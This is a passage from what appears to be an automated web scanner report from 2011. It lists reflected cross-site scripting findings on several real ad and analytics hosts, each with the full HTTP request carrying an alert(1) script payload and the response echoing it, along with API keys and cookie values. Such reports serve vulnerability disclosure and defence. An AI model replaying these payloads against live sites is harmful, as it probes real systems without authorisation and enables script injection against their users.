Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a51ffb0<script>alert(1)</script>08b494b6eae)

3.40. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload a0894<script>alert(1)</script>80c70e92325 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=a0894<script>alert(1)</script>80c70e92325 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=...[SNIP]...

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 23 Jul 2011 13:49:17 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: a0894<script>alert(1)</script>80c70e92325

3.41. http://api.chartbeat.com/toppages/ [jsonp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.chartbeat.com
Path:   /toppages/

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload db4b0<script>alert(1)</script>71de4d7e894 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toppages/?host=observer.com&jsonp=chartbeat_top_pages.cback3471572db4b0<script>alert(1)</script>71de4d7e894&apikey=e58ef8b1512d5591696ca4b8badf20b9&limit=20 HTTP/1.1
Host: api.chartbeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.observer.com/

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 21 Jul 2011 16:12:58 GMT
Content-Type: text/javascript
Connection: close
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 3697

chartbeat_top_pages.cback3471572db4b0<script>alert(1)</script>71de4d7e894([{"i": "The New York Observer", "path": "\/", "visitors": 80}, {"i": "Cond\u00e9 Nast Is Experiencing Technical Difficulties | The New York Observer", "path": "\/2011\/07\/scott-dadich-ipad-conde-nast
...[SNIP]...

3.42. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload e7f85<script>alert(1)</script>8e46a0d32e1 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8e7f85<script>alert(1)</script>8e46a0d32e1&c2=6035308&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:48 GMT
Date: Sat, 23 Jul 2011 04:48:48 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8e7f85<script>alert(1)</script>8e46a0d32e1", c2:"6035308", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.43. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 69d7d<script>alert(1)</script>bd4bc215a3 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=&c5=&c6=&c10=69d7d<script>alert(1)</script>bd4bc215a3&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:50 GMT
Date: Sat, 23 Jul 2011 04:48:50 GMT
Content-Length: 1233
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"", c6:"", c10:"69d7d<script>alert(1)</script>bd4bc215a3", c15:"", c16:"", r:""});



3.44. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 6f3bf<script>alert(1)</script>617bda7171c was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=&c5=&c6=&c10=&c15=6f3bf<script>alert(1)</script>617bda7171c HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:50 GMT
Date: Sat, 23 Jul 2011 04:48:50 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"6f3bf<script>alert(1)</script>617bda7171c", c16:"", r:""});



3.45. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload e1585<script>alert(1)</script>9de0649acd8 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308e1585<script>alert(1)</script>9de0649acd8&c3=&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308e1585<script>alert(1)</script>9de0649acd8", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.46. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 67bdb<script>alert(1)</script>2adb1e58fa was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=67bdb<script>alert(1)</script>2adb1e58fa&c4=&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1233
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308", c3:"67bdb<script>alert(1)</script>2adb1e58fa", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.47. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload e02b4<script>alert(1)</script>82808a089c4 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=e02b4<script>alert(1)</script>82808a089c4&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"e02b4<script>alert(1)</script>82808a089c4", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.48. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload a47dd<script>alert(1)</script>2e55cdb84e7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=&c5=a47dd<script>alert(1)</script>2e55cdb84e7&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"a47dd<script>alert(1)</script>2e55cdb84e7", c6:"", c10:"", c15:"", c16:"", r:""});



3.49. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 714e5<script>alert(1)</script>3108d5897f1 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6035308&c3=&c4=&c5=&c6=714e5<script>alert(1)</script>3108d5897f1&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Sat, 30 Jul 2011 04:48:49 GMT
Date: Sat, 23 Jul 2011 04:48:49 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6035308", c3:"", c4:"", c5:"", c6:"714e5<script>alert(1)</script>3108d5897f1", c10:"", c15:"", c16:"", r:""});



3.50. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bostonglobe.tt.omtrdc.net
Path:   /m2/bostonglobe/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 75990<script>alert(1)</script>7536adf48f6 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/bostonglobe/mbox/standard?mboxHost=www.boston.com&mboxSession=1311428781592-195064&mboxPage=1311428781592-195064&screenHeight=1200&screenWidth=1920&browserWidth=948&browserHeight=845&browserTimeOffset=-300&colorDepth=32&mboxXDomain=enabled&mboxCount=1&mboxPageValue=0.74&pageType=Article%20Page&path=%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F&profile.userRegistered=false&user.categoryAffinity=Lifestyle&mbox=bc_globalMbox75990<script>alert(1)</script>7536adf48f6&mboxId=0&mboxTime=1311410781597&mboxURL=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: bostonglobe.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1311428781592-195064.17; Domain=bostonglobe.tt.omtrdc.net; Expires=Sat, 06-Aug-2011 13:49:13 GMT; Path=/m2/bostonglobe
Content-Type: text/javascript
Content-Length: 209
Date: Sat, 23 Jul 2011 13:49:12 GMT
Server: Test & Target

mboxFactories.get('default').get('bc_globalMbox75990<script>alert(1)</script>7536adf48f6',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1311428781592-195064.17");

3.51. http://bs.serving-sys.com/BurstingPipe/adServer.bs [apui parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the apui request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 2b705%3balert(1)//d4158ff9622 was submitted in the apui parameter. This input was echoed as 2b705;alert(1)//d4158ff9622 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2711514&PluID=0&w=728&h=90&ord=1311271292&ucm=true&ncu=$$http://ib.adnxs.com/click?UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAQUCAQQAAAAAYibxlAAAAAA./cnd=!6QTzJwjfggYQgPwcGNHHASAA/referrer=http%3A%2F%2Fgames.myyearbook.com%2F/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D$$&apui=12b705%3balert(1)//d4158ff9622 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZBUCamZmZmZkFQBsceZa4RtQh_________398aShOAAAAAPknAAC1AAAAbAEAAAIAAAAAPgcA0WMAAAEAAABVU0QAVVNEANgCWgC4Ck8AiQQBAgUCAQQAAAAAYyYClQAAAAA.&pubclick=http://adclick.g.doubleclick.net/aclk?sa%3Dl%26ai%3DBi87SfGkoTpWTLOX1lQev7PBwwMbU9wH4uJ-PG8Cv6u9EABABGAEgADgBUIDH4cQEYMnW8obIo_waggEXY2EtcHViLTczMDY5MTk3MjM4Mjc3NjWyARRnYW1lcy5teXllYXJib29rLmNvbboBCTcyOHg5MF9hc8gBCdoBHGh0dHA6Ly9nYW1lcy5teXllYXJib29rLmNvbS-YAv4DwAIEyAKoqKQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D&tt_code=vert-8&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+98655%2C+25553%29%3B&cnd=!2BuvpQjfggYQgPwcGAAg0ccBMAA4uBVAAEjsAlAAWABgpwZoAHAAeACAAQSIAWaQAQGYAQGgAQGoAQOwAQC5AQAAAKCZmQVAwQEAAACgmZkFQMkBMzMzMzMz9z_ZAQAAAAAAAPA_4AG_Gw..&ccd=!6QTzJwjfggYQgPwcGNHHASAA&referrer=http://games.myyearbook.com/
Cookie: C4=; u2=e1292900-528b-4d66-83e8-593dd8b9e2433I004g; ActivityInfo=000iPlceU%5f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=lHQFb8QF0aSM00002; expires=Wed, 19-Oct-2011 14:01:49 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=al.q0000000002vH; expires=Wed, 19-Oct-2011 14:01:49 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 21 Jul 2011 18:01:49 GMT
Connection: close
Content-Length: 2420

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
.replace(/\[ebRandom\]/ig,ebRand).replace(/\[timestamp\]/ig,ebRand).replace(/\[%tp_adid%\]/ig,5684521).replace(/\[%tp_flightid%\]/ig,2711514).replace(/\[%tp_campaignid%\]/ig,155604);}var strAPU="";if(12b705;alert(1)//d4158ff9622==1)strAPU=ebTokens(gEbBAd.playRS.strAUrl);document.write("<IMG SRC="+strAPU+" width=0 height=0 style='position:absolute;left:0px;top:0px;'>
...[SNIP]...

3.52. http://contextlinks.netseer.com/dsatserving2/servlet/BannerServer [trurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://contextlinks.netseer.com
Path:   /dsatserving2/servlet/BannerServer

Issue detail

The value of the trurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aeab6"><script>alert(1)</script>1e5a96efa2 was submitted in the trurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /dsatserving2/servlet/BannerServer?tagid=1494&url=http%3A%2F%2Fwww.lifescript.com%2Fhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd.aspx&trurl=http%3A%2F%2Fad.doubleclick.net%2Fclick%3Bh%3Dv8%2F3b4b%2F3%2F0%2F*%2Fk%3B227818253%3B0-0%3B0%3B31210306%3B748-470%2F60%3B37939276%2F37957052%2F1%3B%3B~okv%3D%3Bpath%3Dhealth%2Fconditions%2Fadd%2Fhow_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D!webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3Dpencil%3Btile%3D20%3B~sscs%3D%3Faeab6"><script>alert(1)</script>1e5a96efa2&rfd=www.lifescript.com&adh=60&adw=470&frd=1311276185290 HTTP/1.1
Host: contextlinks.netseer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=pencil;tile=20;sz=470x60;ord=101352252258050

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 8 Aug 2006 10:00:00 GMT
